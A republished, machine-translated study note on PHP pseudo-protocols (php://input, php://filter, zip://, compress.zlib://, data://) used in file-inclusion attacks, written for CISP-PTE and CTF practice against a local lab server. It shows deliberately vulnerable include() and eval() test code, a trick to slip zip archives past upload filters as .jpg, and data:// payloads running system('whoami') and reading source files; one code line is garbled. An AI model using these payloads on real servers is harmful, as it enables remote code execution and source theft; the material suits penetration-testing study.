当前位置:网站首页>Summary of PHP pseudo protocol of cisp-pte

Summary of PHP pseudo protocol of cisp-pte

2022-07-05 16:42:00 Colorful @ star

PHP Pseudo protocol summary

0x00 php://input

// All tests are allow_url_fopen=On,allow_url_include=On!!!

php://input  It's a read-only stream that can access the requested raw data . POST  In the case of a request , Best use  php://input  Instead of  $HTTP_RAW_POST_DATA, Because it doesn't depend on specific  php.ini  Instructions .  and , In this case  $HTTP_RAW_POST_DATA  The default is not filled ,  Than activate  always_populate_raw_post_data  Potentially requires less memory . enctype=”multipart/form-data”  When  php://input  It's invalid .

——php.net

Simply put, get post data .

Test code :

The file contains variable command execution :

Test code :

<?php

$d = file_get_contents(‘php://input’);
//echo d ; @ e v a l ( d; @eval( d;@eval(d)
?>

<?php @include($_GET[“file”]); ?>

 

Write a sentence :

0x01 php://filter

php://filter  It's a meta wrapper ,  Designed for when data flow is open Screening filtration application .  This is for the all-in-one (all-in-one) The file function of is very useful , similar  readfile()、 file()  and  file_get_contents(),  There is no chance to apply other filters before the data stream content is read .

——php.net

Simply put, we often use it base64 code , Such as 

php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini”

A variety of filters can be used ( character string / transformation / Compress / encryption )

It is often used to read files / Source code :

0x02 zip://,bzip2://,zlib://

zlib:  Similar function of  gzopen(), however   Its data flow can also be  fread()  And other file system functions .  since  PHP 4.3.0  The latter is not recommended to be used , Because it will be with others “:” Character file names are confused ;  Please use  compress.zlib://  As a substitute .

compress.zlib://、 compress.bzip2://  and  gzopen()bzopen()  They are equal. . And it can be used when  fopencookie  Used in the system .

ZIP  Expand   registered  zip:  wrapper .  since  PHP 7.2.0  and  libzip 1.2.0+  rise , Encryption archiving begins to support passwords , Allow passwords to be used in data streams .  Byte stream context (stream contexts) Use in  ‘password’  Option set password .

optional

  • zlib://file.gz
  • bzip2://file.bz2
  • zip://archive.zip#dir/file.txt

——php.net

Simply put, it is to directly access the files in the compressed package .

1. zip://

take phpinfo.txt Compressed into zip, In practice, the suffix can be changed to jpg Bypass upload restrictions .

http://192.168.43.173:8999/lsawebtest/phptest/phprotocol1.php?file=zip://C:/phpStudy/PHPTutorial/WWW/lsawebtest/phptest\phpinfo.jpg%23phpinfo.txt

Pay attention to the absolute path +url code #

2. zlib://

http://192.168.43.173:8999/lsawebtest/phptest/phprotocol1.php?file=compress.zlib://C:/phpStudy/PHPTutorial/WWW/lsawebtest/phptest/phpinfo.txt.gz

Change suffix to jpg Yes , Relative path is also acceptable .

 

3. bzip2://

In the same way in zlib://

 

0x03 data://

data://text/plain;base64,

http://192.168.43.173:8999/lsawebtest/phptest/phprotocol1.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==

No addition // Yes .

Can also be used to read php File source code :
data:text/plain,<?php system(‘cat /var/www/phprotocol1.php’)?>

Or command execution :
data:text/plain,<?php system(‘whoami’)?>

 

0x04  Conclusion

ctf We often use php Fake protocol , It may have miraculous effects in actual combat .

0x05 Reference material

https://www.waitalone.cn/php-file-include.html

www.freebuf.com/column/148886.html

http://php.net/manual/zh/wrappers.php

</article>
原网站

版权声明
本文为[Colorful @ star]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/186/202207051528108667.html

边栏推荐

猜你喜欢

随机推荐